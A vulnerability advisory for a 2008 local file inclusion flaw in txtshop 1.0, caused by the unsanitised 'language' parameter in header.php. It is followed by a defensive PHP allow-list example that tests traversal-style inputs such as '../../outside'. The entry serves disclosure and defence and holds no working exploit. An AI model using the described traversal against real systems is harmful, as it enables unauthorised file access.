vendor: txtshop
by: Pepelux
CVSS: 8.8 HIGH
Local File Inclusion Vulnerability
CWE: 98
Product Name: txtshop
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: txtshop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
txtshop – beta 1.0 / Local File Inclusion Vulnerability
A Local File Inclusion vulnerability exists in txtshop version 1.0. The 'language' parameter in the 'header.php' script is not properly sanitized before being used in an 'include_once' function call, so it can be abused to include arbitrary files from local resources via directory traversal. Successful exploitation requires that 'register_globals' is set to 'on'.
Mitigation:
Input validation should be used to ensure that user-supplied input is properly sanitized before being used in 'include_once' function calls.
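
One way to apply this mitigation, shown as an added example that is not txtshop's own code: the 'language' value is matched against a fixed allow-list and the resolved path is checked to stay inside the language directory before it reaches 'include_once'. The names ALLOWED_LANGUAGES, DEFAULT_LANGUAGE and resolve_language_file(), the language codes and the directory layout are assumptions made for illustration.

```php
<?php
// Added example, not txtshop code. ALLOWED_LANGUAGES, DEFAULT_LANGUAGE,
// resolve_language_file() and the directory layout are hypothetical.
const ALLOWED_LANGUAGES = ['en', 'es'];   // constructed list of shipped languages
const DEFAULT_LANGUAGE  = 'en';

/**
 * Map an untrusted 'language' value to a file inside $baseDir.
 * Anything that is not an exact allow-list match falls back to the default.
 */
function resolve_language_file($requested, string $baseDir): string
{
    // Strict match against fixed values: traversal sequences, null bytes,
    // arrays and empty input can never select a file name.
    $code = (is_string($requested) && in_array($requested, ALLOWED_LANGUAGES, true))
        ? $requested
        : DEFAULT_LANGUAGE;

    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('language directory not found');
    }
    // Defence in depth: the resolved path must still sit under $baseDir.
    $path   = realpath($base . DIRECTORY_SEPARATOR . $code . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('language file not available');
    }
    return $path;
}

// Constructed demo: a temporary directory stands in for the language folder.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lang_demo_' . getmypid();
if (!is_dir($dir)) {
    mkdir($dir);
}
foreach (ALLOWED_LANGUAGES as $l) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $l . '.php', "<?php\n");
}

// Constructed inputs: one valid code, then values that must fall back to 'en'.
foreach (['es', '../../outside', "en\0", ['x'], null] as $input) {
    echo json_encode($input), ' => ', basename(resolve_language_file($input, $dir)), "\n";
}

// In a page, read the value explicitly instead of trusting a global that
// register_globals could populate:
//   include_once resolve_language_file($_GET['language'] ?? null, __DIR__ . '/lang');
```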